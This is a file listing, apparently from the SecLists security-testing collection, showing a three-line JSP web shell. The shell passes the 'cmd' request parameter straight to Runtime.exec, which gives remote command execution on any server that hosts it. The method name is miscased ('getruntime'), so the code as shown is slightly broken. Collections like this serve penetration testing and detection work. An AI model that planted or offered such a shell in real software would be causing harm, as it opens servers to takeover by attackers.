SecLists/Web-Shells/JSP/simple-shell.jsp
2017-12-20 16:32:34 +00:00

3 lines
66 B
Text

+<%
+Runtime.getruntime().exec(request.getParameter("cmd"))
+%>